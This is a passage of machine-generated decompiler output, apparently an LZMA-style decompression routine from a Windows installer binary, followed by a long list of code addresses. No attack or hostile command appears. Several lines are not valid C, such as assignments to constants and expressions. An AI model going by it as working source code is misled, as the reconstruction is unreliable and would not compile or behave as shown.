                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t156 = __ebp - 0x70;
                      												 *_t156 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t156;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												while(1) {
                      													L48:
                      													__eflags = __ebx - 0x100;
                      													if(__ebx >= 0x100) {
                      														break;
                      													}
                      													__eax =  *(__ebp - 0x58);
                      													__edx = __ebx + __ebx;
                      													__ecx =  *(__ebp - 0x10);
                      													__esi = __edx + __eax;
                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                      													__ax =  *__esi;
                      													 *(__ebp - 0x54) = __esi;
                      													__edi = __ax & 0x0000ffff;
                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      													__eflags =  *(__ebp - 0xc) - __ecx;
                      													if( *(__ebp - 0xc) >= __ecx) {
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      														__cx = __ax;
                      														_t170 = __edx + 1; // 0x1
                      														__ebx = _t170;
                      														__cx = __ax >> 5;
                      														__eflags = __eax;
                      														 *__esi = __ax;
                      													} else {
                      														 *(__ebp - 0x10) = __ecx;
                      														0x800 = 0x800 - __edi;
                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      														__ebx = __ebx + __ebx;
                      														 *__esi = __cx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													 *(__ebp - 0x44) = __ebx;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														continue;
                      													} else {
                      														goto L46;
                      													}
                      												}
                      												L54:
                      												_t173 = __ebp - 0x34;
                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      												__eflags =  *_t173;
                      												goto L55;
                      											case 0xf:
                      												L58:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xf;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t203 = __ebp - 0x70;
                      												 *_t203 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t203;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L60:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													L55:
                      													__al =  *(__ebp - 0x44);
                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      													goto L56;
                      												}
                      												L61:
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t217 = __edx + 1; // 0x1
                      													__ebx = _t217;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L60;
                      												} else {
                      													goto L58;
                      												}
                      											case 0x10:
                      												L109:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0x10;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t365 = __ebp - 0x70;
                      												 *_t365 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t365;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												goto L111;
                      											case 0x11:
                      												L68:
                      												_t614 =  *(_t621 - 0x58);
                      												 *(_t621 - 0x84) = 0x12;
                      												while(1) {
                      													L132:
                      													 *(_t621 - 0x54) = _t614;
                      													goto L133;
                      												}
                      											case 0x12:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 0x58);
                      													 *(__ebp - 0x84) = 0x13;
                      													__esi =  *(__ebp - 0x58) + 2;
                      													while(1) {
                      														L132:
                      														 *(_t621 - 0x54) = _t614;
                      														goto L133;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x4c);
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                      												__ecx =  *(__ebp - 0x58);
                      												__eax =  *(__ebp - 0x4c) << 4;
                      												__eflags = __eax;
                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                      												goto L130;
                      											case 0x13:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													_t469 = __ebp - 0x58;
                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                      													__eflags =  *_t469;
                      													 *(__ebp - 0x30) = 0x10;
                      													 *(__ebp - 0x40) = 8;
                      													L144:
                      													 *(__ebp - 0x7c) = 0x14;
                      													goto L145;
                      												}
                      												__eax =  *(__ebp - 0x4c);
                      												__ecx =  *(__ebp - 0x58);
                      												__eax =  *(__ebp - 0x4c) << 4;
                      												 *(__ebp - 0x30) = 8;
                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                      												L130:
                      												 *(__ebp - 0x58) = __eax;
                      												 *(__ebp - 0x40) = 3;
                      												goto L144;
                      											case 0x14:
                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                      												__eax =  *(__ebp - 0x80);
                      												 *(_t621 - 0x88) = _t542;
                      												goto L1;
                      											case 0x15:
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xb;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                      												goto L120;
                      											case 0x16:
                      												__eax =  *(__ebp - 0x30);
                      												__eflags = __eax - 4;
                      												if(__eax >= 4) {
                      													_push(3);
                      													_pop(__eax);
                      												}
                      												__ecx =  *(__ebp - 4);
                      												 *(__ebp - 0x40) = 6;
                      												__eax = __eax << 7;
                      												 *(__ebp - 0x7c) = 0x19;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L145;
                      											case 0x17:
                      												L145:
                      												__eax =  *(__ebp - 0x40);
                      												 *(__ebp - 0x50) = 1;
                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                      												goto L149;
                      											case 0x18:
                      												L146:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0x18;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t484 = __ebp - 0x70;
                      												 *_t484 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t484;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L148:
                      												_t487 = __ebp - 0x48;
                      												 *_t487 =  *(__ebp - 0x48) - 1;
                      												__eflags =  *_t487;
                      												L149:
                      												__eflags =  *(__ebp - 0x48);
                      												if( *(__ebp - 0x48) <= 0) {
                      													__ecx =  *(__ebp - 0x40);
                      													__ebx =  *(__ebp - 0x50);
                      													0 = 1;
                      													__eax = 1 << __cl;
                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      													__eax =  *(__ebp - 0x7c);
                      													 *(__ebp - 0x44) = __ebx;
                      													while(1) {
                      														 *(_t621 - 0x88) = _t542;
                      														goto L1;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x50);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      												__eax =  *(__ebp - 0x58);
                      												__esi = __edx + __eax;
                      												 *(__ebp - 0x54) = __esi;
                      												__ax =  *__esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													__cx = __ax >> 5;
                      													__eax = __eax - __ecx;
                      													__edx = __edx + 1;
                      													__eflags = __edx;
                      													 *__esi = __ax;
                      													 *(__ebp - 0x50) = __edx;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L148;
                      												} else {
                      													goto L146;
                      												}
                      											case 0x19:
                      												__eflags = __ebx - 4;
                      												if(__ebx < 4) {
                      													 *(__ebp - 0x2c) = __ebx;
                      													L119:
                      													_t393 = __ebp - 0x2c;
                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                      													__eflags =  *_t393;
                      													L120:
                      													__eax =  *(__ebp - 0x2c);
                      													__eflags = __eax;
                      													if(__eax == 0) {
                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      														goto L170;
                      													}
                      													__eflags = __eax -  *(__ebp - 0x60);
                      													if(__eax >  *(__ebp - 0x60)) {
                      														goto L171;
                      													}
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      													__eax =  *(__ebp - 0x30);
                      													_t400 = __ebp - 0x60;
                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      													__eflags =  *_t400;
                      													goto L123;
                      												}
                      												__ecx = __ebx;
                      												__eax = __ebx;
                      												__ecx = __ebx >> 1;
                      												__eax = __ebx & 0x00000001;
                      												__ecx = (__ebx >> 1) - 1;
                      												__al = __al | 0x00000002;
                      												__eax = (__ebx & 0x00000001) << __cl;
                      												__eflags = __ebx - 0xe;
                      												 *(__ebp - 0x2c) = __eax;
                      												if(__ebx >= 0xe) {
                      													__ebx = 0;
                      													 *(__ebp - 0x48) = __ecx;
                      													L102:
                      													__eflags =  *(__ebp - 0x48);
                      													if( *(__ebp - 0x48) <= 0) {
                      														__eax = __eax + __ebx;
                      														 *(__ebp - 0x40) = 4;
                      														 *(__ebp - 0x2c) = __eax;
                      														__eax =  *(__ebp - 4);
                      														__eax =  *(__ebp - 4) + 0x644;
                      														__eflags = __eax;
                      														L108:
                      														__ebx = 0;
                      														 *(__ebp - 0x58) = __eax;
                      														 *(__ebp - 0x50) = 1;
                      														 *(__ebp - 0x44) = 0;
                      														 *(__ebp - 0x48) = 0;
                      														L112:
                      														__eax =  *(__ebp - 0x40);
                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      															_t391 = __ebp - 0x2c;
                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      															__eflags =  *_t391;
                      															goto L119;
                      														}
                      														__eax =  *(__ebp - 0x50);
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      														__eax =  *(__ebp - 0x58);
                      														__esi = __edi + __eax;
                      														 *(__ebp - 0x54) = __esi;
                      														__ax =  *__esi;
                      														__ecx = __ax & 0x0000ffff;
                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      														__eflags =  *(__ebp - 0xc) - __edx;
                      														if( *(__ebp - 0xc) >= __edx) {
                      															__ecx = 0;
                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      															__ecx = 1;
                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      															__ebx = 1;
                      															__ecx =  *(__ebp - 0x48);
                      															__ebx = 1 << __cl;
                      															__ecx = 1 << __cl;
                      															__ebx =  *(__ebp - 0x44);
                      															__ebx =  *(__ebp - 0x44) | __ecx;
                      															__cx = __ax;
                      															__cx = __ax >> 5;
                      															__eax = __eax - __ecx;
                      															__edi = __edi + 1;
                      															__eflags = __edi;
                      															 *(__ebp - 0x44) = __ebx;
                      															 *__esi = __ax;
                      															 *(__ebp - 0x50) = __edi;
                      														} else {
                      															 *(__ebp - 0x10) = __edx;
                      															0x800 = 0x800 - __ecx;
                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      															 *__esi = __dx;
                      														}
                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                      														if( *(__ebp - 0x10) >= 0x1000000) {
                      															L111:
                      															_t368 = __ebp - 0x48;
                      															 *_t368 =  *(__ebp - 0x48) + 1;
                      															__eflags =  *_t368;
                      															goto L112;
                      														} else {
                      															goto L109;
                      														}
                      													}
                      													__ecx =  *(__ebp - 0xc);
                      													__ebx = __ebx + __ebx;
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      													 *(__ebp - 0x44) = __ebx;
                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      														__ecx =  *(__ebp - 0x10);
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      														__ebx = __ebx | 0x00000001;
                      														__eflags = __ebx;
                      														 *(__ebp - 0x44) = __ebx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														L101:
                      														_t338 = __ebp - 0x48;
                      														 *_t338 =  *(__ebp - 0x48) - 1;
                      														__eflags =  *_t338;
                      														goto L102;
                      													} else {
                      														goto L99;
                      													}
                      												}
                      												__edx =  *(__ebp - 4);
                      												__eax = __eax - __ebx;
                      												 *(__ebp - 0x40) = __ecx;
                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      												goto L108;
                      											case 0x1a:
                      												L56:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													 *(__ebp - 0x88) = 0x1a;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x68);
                      												__al =  *(__ebp - 0x5c);
                      												__edx =  *(__ebp - 8);
                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      												 *( *(__ebp - 0x68)) = __al;
                      												__ecx =  *(__ebp - 0x14);
                      												 *(__ecx +  *(__ebp - 8)) = __al;
                      												__eax = __ecx + 1;
                      												__edx = 0;
                      												_t192 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t192;
                      												goto L79;
                      											case 0x1b:
                      												L75:
                      												__eflags =  *(__ebp - 0x64);
                      												if( *(__ebp - 0x64) == 0) {
                      													 *(__ebp - 0x88) = 0x1b;
                      													goto L170;
                      												}
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__edx =  *(__ebp - 8);
                      												__cl =  *(__eax + __edx);
                      												__eax =  *(__ebp - 0x14);
                      												 *(__ebp - 0x5c) = __cl;
                      												 *(__eax + __edx) = __cl;
                      												__eax = __eax + 1;
                      												__edx = 0;
                      												_t274 = __eax %  *(__ebp - 0x74);
                      												__eax = __eax /  *(__ebp - 0x74);
                      												__edx = _t274;
                      												__eax =  *(__ebp - 0x68);
                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      												_t283 = __ebp - 0x64;
                      												 *_t283 =  *(__ebp - 0x64) - 1;
                      												__eflags =  *_t283;
                      												 *( *(__ebp - 0x68)) = __cl;
                      												L79:
                      												 *(__ebp - 0x14) = __edx;
                      												goto L80;
                      											case 0x1c:
                      												while(1) {
                      													L123:
                      													__eflags =  *(__ebp - 0x64);
                      													if( *(__ebp - 0x64) == 0) {
                      														break;
                      													}
                      													__eax =  *(__ebp - 0x14);
                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      													__eflags = __eax -  *(__ebp - 0x74);
                      													if(__eax >=  *(__ebp - 0x74)) {
                      														__eax = __eax +  *(__ebp - 0x74);
                      														__eflags = __eax;
                      													}
                      													__edx =  *(__ebp - 8);
                      													__cl =  *(__eax + __edx);
                      													__eax =  *(__ebp - 0x14);
                      													 *(__ebp - 0x5c) = __cl;
                      													 *(__eax + __edx) = __cl;
                      													__eax = __eax + 1;
                      													__edx = 0;
                      													_t414 = __eax %  *(__ebp - 0x74);
                      													__eax = __eax /  *(__ebp - 0x74);
                      													__edx = _t414;
                      													__eax =  *(__ebp - 0x68);
                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      													__eflags =  *(__ebp - 0x30);
                      													 *( *(__ebp - 0x68)) = __cl;
                      													 *(__ebp - 0x14) = _t414;
                      													if( *(__ebp - 0x30) > 0) {
                      														continue;
                      													} else {
                      														L80:
                      														 *(__ebp - 0x88) = 2;
                      														goto L1;
                      													}
                      												}
                      												 *(__ebp - 0x88) = 0x1c;
                      												goto L170;
                      										}
                      									}
                      									L171:
                      									_t544 = _t543 | 0xffffffff;
                      									goto L172;
                      								}
                      							}
                      						}
                      					}
                      					goto L1;
                      				}
                      			}














                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00406734
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x0040673a
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
